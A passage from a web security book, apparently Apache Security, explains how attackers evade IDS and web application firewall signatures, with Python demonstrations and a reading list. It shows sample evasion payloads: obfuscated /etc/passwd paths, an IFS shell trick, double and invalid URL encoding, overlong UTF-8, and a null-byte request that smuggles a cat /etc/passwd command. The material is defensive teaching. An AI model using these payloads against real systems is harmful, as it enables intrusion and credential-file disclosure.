Intrusion detection systems (IDSs) are an integral part of web application security. In Chapter 9, I introduced web application firewalls (also covered in Chapter 12), whose purpose is to detect and reject malicious requests.
Most web application firewalls are signature-based. This means they monitor HTTP traffic looking for signature matches, where this type of “signature” is a pattern that suggests an attack. When a request is matched against a signature, an action is taken (as specified by the configuration). But if an attacker modifies the attack payload in some way to have the same meaning for the target but not to resemble a signature the web application firewall is looking for, the request will go through. Techniques of attack payload modification to avoid detection are called evasion techniques.
Evasion techniques are a well-known tool in the TCP/IP-world, having been used against network-level IDS tools for years. In the web security world, evasion is somewhat new. Here are some papers on the subject:
“A look at whisker’s anti-IDS tactics” by Rain Forest Puppy (http://www.apachesecurity.net/archive/whiskerids.html)
“IDS Evasion Techniques and Tactics” by Kevin Timm (http://www.securityfocus.com/printable/infocus/1577)
We start with some simple yet effective evasion techniques:
Using mixed case can be useful when attacking platforms (e.g., Windows) where filenames are not case sensitive; otherwise, it is useless. Its usefulness rises, however, if the target Apache includes mod_speling as one of its modules. This module tries to find a matching file on disk, ignoring case and allowing up to one spelling mistake.
Sometimes people do not realize you can escape any character by preceding the character with a backslash character (\), and if the character does not have a special meaning, the escaped character will convert into itself. Thus, \d converts to d. It is not much, but it is enough to fool an IDS. For example, an IDS looking for the pattern id would not detect the string i\d, which has essentially the same meaning.
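The backslash trick, and the corresponding IDS countermeasure, can be sketched in a few lines of Python (the unescape_shell helper is a simplified stand-in for a real normalization step):

```python
import re

def unescape_shell(s: str) -> str:
    # In the shell, a backslash before an ordinary character yields
    # the character itself, so "i\d" means the same as "id".
    return re.sub(r'\\(.)', r'\1', s)

attack = r'i\d'
assert 'id' not in attack               # a naive signature misses it
assert 'id' in unescape_shell(attack)   # the normalized form is caught
```

An IDS that normalizes escapes before matching sees the same string the shell eventually executes.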
Using excessive whitespace, especially less frequently considered characters such as TAB and newline, can be an evasion technique. For example, if an attacker creates an SQL injection attempt using DELETE  FROM (with two spaces between the words instead of one), the attack will go undetected by an IDS looking for DELETE FROM (with just one space in between).
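An IDS can defeat whitespace evasion by normalizing the request before matching. A minimal Python sketch (the normalize_ws helper is illustrative):

```python
import re

def normalize_ws(s: str) -> str:
    # Collapse any run of whitespace (spaces, tabs, newlines)
    # into a single space before signature matching.
    return re.sub(r'\s+', ' ', s)

probe = "DELETE  \t FROM users"
assert "DELETE FROM" not in probe              # naive match misses it
assert "DELETE FROM" in normalize_ws(probe)    # normalized match hits
```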
Many evasion techniques are used in attacks against the filesystem. For example, many methods can obfuscate paths to make them less detectable:
When a ./ combination is used in a path, it does not change the meaning, but it breaks the sequence of characters in two. For example, /etc/passwd may be obfuscated to the equivalent /etc/./passwd.
Using double slashes is one of the oldest evasion techniques. For example, /etc/passwd may be written as /etc//passwd.
Path traversal occurs when a backreference is used to back out of the current folder, but the name of the folder is used again to advance. For example, /etc/passwd may be written as /etc/dummy/../passwd, and both versions are legal. This evasion technique can be used against application code that performs a file download to make it disclose an arbitrary file on the filesystem. Another use of the attack is to evade an IDS looking for well-known patterns in the traffic (/etc/passwd is one example).
When the web server is running on Windows, the Windows-specific folder separator \ can be used. For example, ../../cmd.exe may be written as ..\..\cmd.exe.
The Internal Field Separator (IFS) is a feature of some Unix shells (sh and bash, for example) that allows the user to change the field separator (normally, a whitespace character) to something else. After you execute an IFS=X command on the shell command line, you can type CMD=X/bin/catX/etc/passwd;eval$CMD to display the contents of the /etc/passwd file on screen.
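The first three obfuscation forms above all collapse to the same canonical path once normalized, which is why IDS tools canonicalize paths before matching. A quick check with Python's posixpath module:

```python
import posixpath

# All of these obfuscated forms collapse to the same canonical path:
variants = [
    "/etc/./passwd",
    "/etc//passwd",
    "/etc/dummy/../passwd",
]
for v in variants:
    print(v, "->", posixpath.normpath(v))
# each one normalizes to /etc/passwd
```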
Some characters have a special meaning in URLs, and they have to be encoded if they are going to be sent to an application rather than interpreted according to their special meanings. This is what URL encoding is for. (See RFC 1738 at http://www.ietf.org/rfc/rfc1738.txt and RFC 2396 at http://www.ietf.org/rfc/rfc2396.txt.) I showed URL encoding several times in this chapter, and it is an essential technique for most web application attacks.
It can also be used as an evasion technique against some network-level IDS systems. URL encoding is mandatory only for some characters but can be used for any. As it turns out, sending a string of URL-encoded characters may help an attack slip under the radar of some IDS tools. In reality, most tools have improved to handle this situation.
On rare occasions you may encounter an application that performs URL decoding twice. This is not correct behavior according to the standards, but it does happen. In such a case, an attacker can evade detection by performing URL encoding twice.
The URL:
http://www.example.com/paynow.php?p=attack
becomes:
http://www.example.com/paynow.php?p=%61%74%74%61%63%6B
when encoded once (since %61 is an encoded a character, %74 is an encoded t character, and so on), but:
http://www.example.com/paynow.php?p=%2561%2574%2574%2561%2563%256B
when encoded twice (where %25 represents a percent sign).
If you have an IDS watching for the word “attack”, it will (rightly) decode the URL only once and fail to detect the word. But the word will reach the application that decodes the data twice.
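The double-encoding trick is easy to reproduce with Python's urllib.parse, used here purely to demonstrate the two decoding steps:

```python
from urllib.parse import unquote

doubly = "%2561%2574%2574%2561%2563%256B"
once = unquote(doubly)    # what a correct IDS sees after one decode
twice = unquote(once)     # what the flawed application ends up with
print(once)               # %61%74%74%61%63%6B -- "attack" still hidden
print(twice)              # attack
```

An IDS that decodes once never sees the word, while the application that decodes twice does.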
There is another way to exploit badly written decoding schemes. As you know, a character is URL-encoded when it is represented with a percent sign followed by two hexadecimal digits (0-F, representing the values 0-15). However, some decoding functions never check whether the two characters following the percent sign are valid hexadecimal digits. Here is what a C function for handling the two digits might look like:
unsigned char x2c(unsigned char *what) {
    unsigned char c0 = toupper(what[0]);
    unsigned char c1 = toupper(what[1]);
    unsigned char digit;

    digit = (c0 >= 'A' ? c0 - 'A' + 10 : c0 - '0');
    digit = digit * 16;
    digit = digit + (c1 >= 'A' ? c1 - 'A' + 10 : c1 - '0');

    return digit;
}
This code does not do any validation. It will correctly decode valid URL-encoded characters, but what happens when an invalid combination is supplied? By using characters beyond the valid hexadecimal range, we could smuggle a slash character, for example, without an IDS noticing. To do so, we would specify XV for the two digits, since the above algorithm converts that combination to the ASCII character code for a slash.
The URL:
http://www.example.com/paynow.php?p=/etc/passwd
would therefore be represented by:
http://www.example.com/paynow.php?p=%XVetc%XVpasswd
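The flawed C routine above can be reproduced in Python to confirm the effect (the & 0xFF masking mimics C's implicit unsigned char truncation):

```python
def x2c(pair: str) -> int:
    # Direct translation of the C function above, with no validation
    # of the hexadecimal digits -- exactly the flaw being exploited.
    def val(ch):
        ch = ch.upper()
        if ch >= 'A':
            return ord(ch) - ord('A') + 10
        return ord(ch) - ord('0')
    digit = val(pair[0]) & 0xFF
    digit = (digit * 16) & 0xFF      # unsigned char overflow wraps here
    digit = (digit + val(pair[1])) & 0xFF
    return digit

print(chr(x2c("2F")))   # / -- the legitimate encoding of a slash
print(chr(x2c("XV")))   # / -- the invalid combination decodes the same
```

Both %2F and the invalid %XV yield a slash, but only the former matches an IDS signature written in terms of valid URL encoding.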
Unicode attacks can be effective against applications that understand it. Unicode is the international standard whose goal is to represent every character needed by every written human language as a single integer number (see http://en.wikipedia.org/wiki/Unicode). What is known as Unicode evasion should more correctly be referred to as UTF-8 evasion. Unicode characters are normally represented with two bytes, but this is impractical in real life. First, there are large amounts of legacy documents that need to be handled. Second, in many cases only a small number of Unicode characters are needed in a document, so using two bytes per character would be wasteful.
Internet Information Server (IIS) supports a special (nonstandard) way of representing Unicode characters, designed to resemble URL encoding. If a letter “u” comes after the percent sign, then the four hexadecimal digits that follow are taken to represent a full Unicode character (e.g., %u002F for a slash). This feature has been used in many attacks carried out against IIS servers. You will need to pay attention to this type of attack if you are maintaining an Apache-based reverse proxy to protect IIS servers.
UTF-8, a transformation format of ISO 10646 (http://www.ietf.org/rfc/rfc2279.txt), allows most files to stay as they are and still be Unicode compatible. Until a special byte sequence is encountered, each byte represents a character from the ASCII character set. When a special byte sequence is used, two or more (up to six) bytes can be combined to form a single complex Unicode character.
One aspect of UTF-8 encoding causes problems: a single character can have multiple representations. Encodings that use more bytes than necessary are known as overlong characters, and they may be a sign of an attempted attack. For example, there are five overlong ways to encode an ASCII character. The five byte sequences below all decode to a newline character (0x0A):
0xc0 0x8A
0xe0 0x80 0x8A
0xf0 0x80 0x80 0x8A
0xf8 0x80 0x80 0x80 0x8A
0xfc 0x80 0x80 0x80 0x80 0x8A
Invalid UTF-8 encoding byte combinations are also possible, with similar results to invalid URL encoding.
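You can verify both halves of this problem with a few lines of Python: a strict UTF-8 decoder rejects the overlong sequence, while a naive decoder that only follows the bit layout happily produces the newline:

```python
# The two-byte overlong encoding of a newline (0x0A) from the list above.
overlong_newline = b"\xc0\x8a"

# A strict UTF-8 decoder must reject overlong sequences; Python's does:
try:
    overlong_newline.decode("utf-8")
    strict = False
except UnicodeDecodeError:
    strict = True
print("overlong sequence rejected:", strict)

# A naive decoder that only follows the two-byte bit pattern
# (110xxxxx 10xxxxxx) would accept it -- the evasion in action:
lead, cont = overlong_newline
naive = ((lead & 0x1F) << 6) | (cont & 0x3F)
assert naive == 0x0A
```

An IDS built on a lenient decoder sees a harmless multibyte character where the application may ultimately see a newline.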
Using URL-encoded null bytes is an evasion technique and an attack at the same time. This attack is effective against applications developed using C-based programming languages. Even with scripted applications, the application engine they were developed to work with is likely to be developed in C and possibly vulnerable to this attack. Even Java programs eventually use native file manipulation functions, making them vulnerable, too.
Internally, all C-based programming languages use the null byte for string termination. When a URL-encoded null byte is planted into a request, it often fools the receiving application, which happily decodes the encoding and plants the null byte into the string. The planted null byte will be treated as the end of the string during the program’s operation, and the part of the string that comes after it and before the real string terminator will practically vanish.
We looked at how a URL-encoded null byte can be used as an attack when we covered source code disclosure vulnerabilities in the “Source Code Disclosure” section. This vulnerability is rare in practice though Perl programs can be in danger of null-byte attacks, depending on how they are programmed.
Null-byte encoding is used as an evasion technique mainly against web application firewalls when they are in place. These systems are almost exclusively C-based (they have to be for performance reasons), making the null-byte evasion technique effective.
Web application firewalls trigger an error when a dangerous signature (pattern) is discovered. They may be configured not to forward the request to the web server, in which case the attack attempt will fail. However, if the signature is hidden after an encoded null byte, the firewall may not detect the signature, allowing the request through and making the attack possible.
To see how this is possible, we will look at a single POST request, representing an attempt to exploit a vulnerable form-to-email script and retrieve the passwd file:
POST /update.php HTTP/1.0
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

firstname=Ivan&lastname=Ristic%00&email=ivanr@webkreator.com;cat%20/etc/passwd
A web application firewall configured to watch for the /etc/passwd string will normally easily prevent such an attack. But notice how we have embedded a null byte at the end of the lastname parameter. If the firewall is vulnerable to this type of evasion, it may miss our command execution attack, enabling us to continue with compromise attempts.
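The truncation effect is easy to demonstrate. The Python sketch below decodes the request body and then simulates what a C string function would see (c_string_view is an illustrative helper):

```python
from urllib.parse import unquote_to_bytes

body = b"lastname=Ristic%00&email=x;cat%20/etc/passwd"
decoded = unquote_to_bytes(body)

def c_string_view(data: bytes) -> bytes:
    # C string functions (strlen, strstr, ...) stop at the first
    # null byte; everything after it is invisible to them.
    return data.split(b"\x00", 1)[0]

print(decoded)                  # the payload really is present
print(c_string_view(decoded))   # but a C-based scanner sees only this
```

The /etc/passwd signature is present in the decoded bytes yet absent from the C view, which is exactly how the firewall is blinded.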
Many SQL injection attacks use unique combinations of characters. An SQL comment --%20 is a good example. Implementing IDS protection based on this information may make you believe you are safe. Unfortunately, SQL is too versatile. There are many ways to subvert an SQL query, keep it valid, but sneak it past an IDS. The first of the papers listed below explains how to write signatures to detect SQL injection attacks, and the second explains how all that effort is useless against a determined attacker:
“Detection of SQL Injection and Cross-site Scripting Attacks” by K. K. Mookhey and Nilesh Burghate (http://www.securityfocus.com/infocus/1768)
“SQL Injection Signatures Evasion” by Ofer Maor and Amichai Shulman (http://www.imperva.com/application_defense_center/white_papers/sql_injection_signatures_evasion.html)
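To illustrate why such signatures are fragile, here is a small Python sketch (the signature and payloads are hypothetical): a pattern that matches the literal --%20 comment misses trivially equivalent variants.

```python
import re

# A naive signature: an SQL comment written exactly as "--%20".
naive = re.compile(r'--%20')

# Equivalent payloads a determined attacker can substitute; in most
# SQL dialects a TAB after "--" or a /* */ comment works just as well.
payloads = [
    "id=1;DROP TABLE users--%20",   # caught
    "id=1;DROP TABLE users--%09",   # TAB instead of space: missed
    "id=1;DROP TABLE users/*x*/",   # block comment instead: missed
]
for p in payloads:
    print(p, "->", "detected" if naive.search(p) else "missed")
```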
“Determined attacker” is a recurring theme in this book. We are using imperfect techniques to protect web applications on the system administration level. They will protect in most but not all cases. The only proper way to deal with security problems is to fix vulnerable applications.
Web security is not easy because it requires knowledge of many different systems and technologies. The resources listed here are only the tip of the iceberg.
HTTP: The Definitive Guide by David Gourley and Brian Totty (O’Reilly)
RFC 2616, “Hypertext Transfer Protocol HTTP/1.1” (http://www.ietf.org/rfc/rfc2616.txt)
HTML 4.01 Specification (http://www.w3.org/TR/html401/)
JavaScript Central (http://devedge.netscape.com/central/javascript/)
ECMAScript Language Specification (http://www.ecma-international.org/publications/files/ecma-st/ECMA-262.pdf)
ECMAScript Components Specification (http://www.ecma-international.org/publications/files/ecma-st/ECMA-290.pdf)
For anyone wanting to seriously explore web security, a fair knowledge of components (e.g., database systems) making up web applications is also necessary.
Web application security is a young discipline. Few books cover the subject in depth. Researchers everywhere, including individuals and company employees, regularly publish papers that show old problems in new light.
Hacking Exposed: Web Applications by Joel Scambray and Mike Shema (McGraw-Hill/Osborne)
Hack Notes: Web Security Portable Reference by Mike Shema (McGraw-Hill/Osborne)
Essential PHP Security by Chris Shiflett (O’Reilly)
Open Web Application Security Project (http://www.owasp.org)
“Guide to Building Secure Web Applications” by OWASP (Open Web Application Security Project) (http://www.owasp.org/documentation/guide.html)
SecurityFocus Web Application Security Mailing List (webappsec@securityfocus.com) (http://www.securityfocus.com/archive/107)
WebGoat (http://www.owasp.org/software/webgoat.html) (also discussed in Appendix A)
WebMaven (http://webmaven.mavensecurity.com/) (also discussed in Appendix A)
SecurityFocus (http://www.securityfocus.com)
CGISecurity (http://www.cgisecurity.com)
Web Application Security Consortium (http://www.webappsec.org)
Web Security Threat Classification (http://www.webappsec.org/threat.html)
ModSecurity Resource Center (http://www.modsecurity.org/db/resources/)
Web Security Blog (http://www.modsecurity.org/blog/)
The World Wide Web Security FAQ (http://www.w3.org/Security/Faq/)